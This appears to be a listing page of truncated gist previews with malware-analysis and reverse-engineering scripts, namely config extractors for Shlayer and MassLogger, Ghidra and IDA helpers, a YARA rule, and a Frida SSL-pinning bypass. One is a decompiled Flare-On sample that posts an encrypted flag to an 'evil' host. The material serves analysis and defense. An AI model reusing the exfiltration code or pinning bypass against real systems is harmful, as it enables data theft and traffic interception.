This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from opcode import opmap | |
import dis | |
code = b"" | |
code += bytes([opmap["LOAD_CONST"], 0]) | |
code += bytes([opmap["GET_LEN"], 0]) | |
code += bytes([opmap["IMPORT_FROM"], 0]) | |
code += bytes([opmap["ROT_TWO"], 0]) | |
code += bytes([opmap["CALL_FUNCTION"], 1]) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# author : [email protected] aka lordx64 | |
# OSX/Shlayer.F C2 config extracting from DMG files | |
# copyright 2022 - All rights reserved | |
# compatible python 3.8 | |
# Note on installation on mac: | |
# brew install gmp | |
# then: env "CFLAGS=-I/usr/local/include -L/usr/local/lib" pip3 install pycrypto | |
from Crypto.Cipher import AES | |
import argparse |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//TODO recordbreaker string decryption via selection | |
//Applied to sample: 746669c6be1807fdafbc7ee3f1e958e1b584fa31688742bcc044d269af94b0d8 (sha256) | |
//@author 0xca7 | |
//@category _NEW_ | |
//@keybinding | |
//@menupath | |
//@toolbar | |
import ghidra.app.script.GhidraScript; | |
import ghidra.program.model.mem.*; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import idaapi as ia, idc | |
def PLUGIN_ENTRY(): return nop() | |
class nop(ia.plugin_t): | |
flags = ia.PLUGIN_UNL | |
comment = "NOP" | |
help = "select bytes, run" | |
wanted_name = "NOP bytes..." | |
wanted_hotkey = "Ctrl+Shift+N" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
console.log("[*] SSL Pinning Bypasses"); | |
console.log(`[*] Your frida version: ${Frida.version}`); | |
console.log(`[*] Your script runtime: ${Script.runtime}`); | |
/** | |
* by incogbyte | |
* Common functions | |
* thx apkunpacker, NVISOsecurity, TheDauntless | |
* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that. | |
* !!! THIS SCRIPT IS NOT A SILVER BULLET !! |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Simple show-off using PowerShell and Reflection to extract masslogger config | |
# Example Sample: https://bazaar.abuse.ch/sample/7187a6d2980e3696396c4fbce939eeeb3733b6afdf2e859a385f8d6b29e8cebc/ | |
# Twitter Info: https://twitter.com/vinopaljiri/status/1593125307468623874 | |
# get the class where config is initialized -> careful, by this we invoked the constructor and all fields are already populated but encrypted | |
$configClass = [System.Reflection.Assembly]::LoadFile("C:\Users\Inferno\Desktop\test\sample.exe").GetTypes() | ? {$_.Name -like "xmA"} | |
# class is static so we are not creating instance of it in Invoke | |
# by invoking this method, config gets decrypted so also its responsible fields (remember reflection Rocks :)) | |
($configClass.GetMethods() | ? {$_.Name -like "Aak"}).Invoke($null, $null) | Out-Null |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# uncompyle6 version 3.7.4 | |
# Python bytecode 3.7 (3394) | |
# Decompiled from: Python 3.7.11 (default, Jul 27 2021, 09:42:29) [MSC v.1916 64 bit (AMD64)] | |
# Embedded file name: <frozen 11> | |
import crypt, base64, requests | |
config = {'url':'http://www.evil.flare-on.com', 'flag':b'[email protected]', 'key':b'PyArmor_Pr0tecteth_My_K3y'} | |
cipher = crypt.ARC4(config['key']) | |
flag = base64.b64encode(cipher.encrypt(config['flag'])) | |
try: | |
requests.post((config['url']), data={'flag': flag}) |
We fit a exponential function for
When not taking a fixed offset of
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import "macho" | |
rule is_go_macho { | |
strings: | |
$go = { ff 20 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 } // \xff Go build ID: \" | |
condition: | |
macho.cputype == macho.CPU_TYPE_X86_64 | |
and | |
for any s in macho.segments : ( |